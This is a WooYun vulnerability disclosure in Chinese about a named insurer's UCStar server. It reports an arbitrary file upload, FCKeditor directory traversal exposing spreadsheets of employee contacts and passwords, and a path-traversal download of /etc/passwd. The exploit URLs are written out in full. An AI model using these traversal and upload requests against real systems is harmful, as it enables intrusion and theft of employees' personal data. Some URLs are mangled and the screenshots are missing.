WooYun.org

URL：http://ucstar.jxlife.com.cn:9090/login.jsp
1、任意文件上传，使用了有漏洞的ucstar，在留言处存在任意文件上传漏洞。
URL：http://ucstar.jxlife.com.cn:9090/webcall_chat/leaveMessage.jsp
如下图：

上传后，保存在如下位置：
http://ucstar.jxlife.com.cn:9090https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/message/
测试上传的文件：
http://ucstar.jxlife.com.cn:9090https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/message/1.JSP
当然也发现了很多其他人传的，可能是由于jetty的配置，导致不能执行，暂时无法getshell
，第二个上传点，FCKeditor也同样，无法getshell，但可借助fck来获取敏感文件
部分恶意文件可在这里看到：
http://ucstar.jxlife.com.cn:9090/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

建议进行清理。
2、敏感文件信息泄露
FCK浏览目录结构：
http://ucstar.jxlife.com.cn:9090/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/../../
如下图：

在网站的upload目录发现一些敏感文件：
http://ucstar.jxlife.com.cn:9090/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/../..https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/

在得知路径的情况下，这些xls文件是可以任意下载的，比如：
http://ucstar.jxlife.com.cn:9090https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/210[1].77.82.29-07--15.xls
结果如下：

再比如：

里面包含了部分员工信息，包括姓名、邮箱、电话及某系统帐号密码信息。
3、任意文件下载
比如：
http://ucstar.jxlife.com.cn:9090/uploadfile?istrade=istrade&filename=../../../../../etc/passwd